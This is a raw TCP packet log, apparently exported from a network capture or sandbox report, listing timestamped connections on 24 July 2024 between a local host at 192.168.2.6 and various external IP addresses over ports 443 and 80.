                                                                                        Jul 24, 2024 07:14:45.509043932 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.509176970 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.595531940 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.595583916 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.596817017 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.598301888 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.598330021 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.599147081 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.599159002 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.599248886 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.599255085 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.599318981 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.599359989 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.599386930 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.599697113 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.599740028 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.599807024 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.599814892 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.599858999 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.600588083 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.600629091 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.602358103 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.602374077 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.602581978 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.603102922 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.634882927 CEST49789443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:45.634939909 CEST4434978940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.635137081 CEST49789443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:45.635730028 CEST49789443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:45.635745049 CEST4434978940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.684900999 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.684950113 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.685883999 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.685931921 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.686316013 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.686340094 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.687283039 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.687303066 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.688769102 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.691523075 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.691550970 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.691627026 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:45.691699982 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.691767931 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.692111015 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.693567038 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.696662903 CEST49784443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:45.696688890 CEST4434978413.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:46.423649073 CEST4434978940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:46.427484035 CEST49789443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:46.441725969 CEST49789443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:46.441740990 CEST4434978940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:46.442590952 CEST4434978940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:46.465285063 CEST49789443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:46.465334892 CEST49789443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:46.465342999 CEST4434978940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:46.549484968 CEST49789443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:46.596503973 CEST4434978940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:46.720824957 CEST4434978940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:46.721200943 CEST4434978940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:46.722606897 CEST49789443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:46.722870111 CEST49789443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:46.722892046 CEST4434978940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:47.064738989 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:47.064790010 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:47.065085888 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:47.065325022 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:47.065337896 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:47.733272076 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:47.738451958 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:47.738476992 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:47.738991976 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:47.747308016 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:47.747529984 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:47.747534037 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:47.788506031 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:47.927158117 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.309961081 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:48.310022116 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.310185909 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:48.310434103 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:48.310450077 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.318223953 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.318260908 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.318270922 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.318288088 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.318296909 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.318316936 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.318698883 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.318722963 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.318773031 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.405992985 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.406011105 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.406075001 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.406080961 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.406133890 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.406167030 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.406177044 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.406194925 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.406331062 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.407871008 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.407881021 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.407923937 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.407954931 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.408396006 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.408418894 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.408574104 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.495810032 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.495831013 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.495873928 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.496665955 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.496721029 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.496751070 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.496800900 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.496867895 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.497267962 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.497905016 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.497955084 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.499222040 CEST49793443192.168.2.613.107.246.40
                                                                                        Jul 24, 2024 07:14:48.499253035 CEST4434979313.107.246.40192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.744843006 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:48.744896889 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.745618105 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:48.746186972 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:48.746202946 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:48.770854950 CEST4972780192.168.2.685.28.47.31
                                                                                        Jul 24, 2024 07:14:48.774631023 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:48.959984064 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.048216105 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.048278093 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.049079895 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.049098015 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.049571991 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.050105095 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.050852060 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.055296898 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.055571079 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.055733919 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.096507072 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.181050062 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.181114912 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.245342016 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.252123117 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.253308058 CEST49799443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.253330946 CEST44349799142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.254215002 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.254247904 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.254694939 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.254894018 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.254903078 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.580471992 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.589031935 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.589082003 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.589581013 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.590341091 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.590370893 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.590389967 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.594243050 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.594430923 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.594599962 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.594696045 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.770513058 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.770530939 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.858395100 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:49.870724916 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:49.925728083 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.018744946 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.018767118 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.019431114 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.019474030 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.020267010 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.029789925 CEST49800443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.029818058 CEST44349800142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.030571938 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.030585051 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.171438932 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.223175049 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.223206043 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.224005938 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.224354982 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.224421978 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.224431992 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.224621058 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.224920034 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.225198030 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.225209951 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.281652927 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.281662941 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.480086088 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.508449078 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.508825064 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.508965015 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.509469986 CEST49802443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.509486914 CEST44349802142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.554435015 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:50.554464102 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.555435896 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:50.555663109 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:50.555670977 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.829890013 CEST4975780192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:14:50.834707022 CEST804975734.107.221.82192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.865367889 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.865578890 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.865600109 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.865974903 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.866693020 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.876497030 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.876766920 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.903570890 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.903763056 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.903770924 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.903779984 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.903796911 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:50.977026939 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:50.977035999 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.077318907 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:51.102258921 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.102588892 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.104636908 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:51.105350018 CEST49807443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:51.105366945 CEST44349807142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.218832970 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.219872952 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:51.219907045 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.221019030 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.221292019 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:51.224541903 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:51.224628925 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.224684000 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:51.272501945 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.277973890 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:51.278024912 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.378334999 CEST4975880192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:14:51.379106045 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:51.383224010 CEST804975834.107.221.82192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.484909058 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.485061884 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.485157013 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.485245943 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.485327959 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:51.485354900 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.485536098 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:51.485613108 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:51.486375093 CEST49808443192.168.2.6142.250.184.228
                                                                                        Jul 24, 2024 07:14:51.486390114 CEST44349808142.250.184.228192.168.2.6
                                                                                        Jul 24, 2024 07:14:54.819941998 CEST49811443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:54.819987059 CEST44349811142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:54.820200920 CEST49811443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:54.820434093 CEST49811443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:54.820447922 CEST44349811142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:55.502698898 CEST44349811142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:55.504138947 CEST49811443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:55.504153013 CEST44349811142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:55.504677057 CEST44349811142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:55.505188942 CEST49811443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:55.505273104 CEST44349811142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:55.505295992 CEST49811443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:55.505348921 CEST49811443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:55.505352974 CEST44349811142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:55.553117037 CEST49811443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:55.808098078 CEST44349811142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:55.808268070 CEST44349811142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:55.808398008 CEST49811443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:55.808995962 CEST49811443192.168.2.6142.250.186.142
                                                                                        Jul 24, 2024 07:14:55.809014082 CEST44349811142.250.186.142192.168.2.6
                                                                                        Jul 24, 2024 07:14:56.835025072 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:56.835053921 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:56.835445881 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:56.837014914 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:56.837032080 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.515243053 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.515316010 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:57.516823053 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:57.516830921 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.517224073 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.525499105 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:57.568548918 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.797818899 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.797851086 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.797873020 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.800720930 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:57.800750017 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.800769091 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:57.800776005 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.802584887 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:57.804174900 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:57.805217028 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:57.805229902 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:14:57.805243969 CEST49814443192.168.2.613.85.23.86
                                                                                        Jul 24, 2024 07:14:57.805250883 CEST4434981413.85.23.86192.168.2.6
                                                                                        Jul 24, 2024 07:15:00.850018024 CEST4975780192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:15:00.855500937 CEST804975734.107.221.82192.168.2.6
                                                                                        Jul 24, 2024 07:15:01.399136066 CEST4975880192.168.2.634.107.221.82
                                                                                        Jul 24, 2024 07:15:01.644321918 CEST804975834.107.221.82192.168.2.6
                                                                                        Jul 24, 2024 07:15:05.786282063 CEST4981980192.168.2.677.91.77.82
                                                                                        Jul 24, 2024 07:15:05.793823004 CEST804981977.91.77.82192.168.2.6
                                                                                        Jul 24, 2024 07:15:05.798831940 CEST4981980192.168.2.677.91.77.82
                                                                                        Jul 24, 2024 07:15:05.798949003 CEST4981980192.168.2.677.91.77.82
                                                                                        Jul 24, 2024 07:15:05.803854942 CEST804981977.91.77.82192.168.2.6
                                                                                        Jul 24, 2024 07:15:05.854266882 CEST4982080192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:05.859395981 CEST804982077.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:05.859848976 CEST4982080192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:05.859972954 CEST4982080192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:05.864844084 CEST804982077.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:06.675759077 CEST804981977.91.77.82192.168.2.6
                                                                                        Jul 24, 2024 07:15:06.675810099 CEST804982077.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:06.675856113 CEST4981980192.168.2.677.91.77.82
                                                                                        Jul 24, 2024 07:15:06.675944090 CEST4982080192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:06.678679943 CEST4982080192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:06.678776979 CEST4981980192.168.2.677.91.77.82
                                                                                        Jul 24, 2024 07:15:06.683510065 CEST804982077.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:06.683640957 CEST804981977.91.77.82192.168.2.6
                                                                                        Jul 24, 2024 07:15:06.900939941 CEST804982077.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:06.901004076 CEST4982080192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:06.901160955 CEST804981977.91.77.82192.168.2.6
                                                                                        Jul 24, 2024 07:15:06.901293039 CEST4981980192.168.2.677.91.77.82
                                                                                        Jul 24, 2024 07:15:07.018007040 CEST4982080192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.018305063 CEST4982180192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:15:07.024194956 CEST804982177.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.025870085 CEST804982077.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:15:07.027923107 CEST4982080192.168.2.677.91.77.81
